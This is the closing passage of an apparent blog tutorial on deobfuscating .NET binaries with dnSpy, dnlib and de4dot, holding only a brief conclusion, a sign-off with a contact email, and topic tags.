We now have a deobfuscated binary. You can easily do much, much more with dnSpy - I thought I’d create this for those wondering where to start.

Conclusion

The library we’re using, dnlib, is extremely powerful and easy to use. Although de4dot is extensive in its deobfuscation efforts you may wish to do something further with deobfuscation. Anyway, I hope by reading this you learnt something. For now, ciao!

If you’ve got any questions, feel free to email me: [email protected]

obfuscation malware re dnlib analysis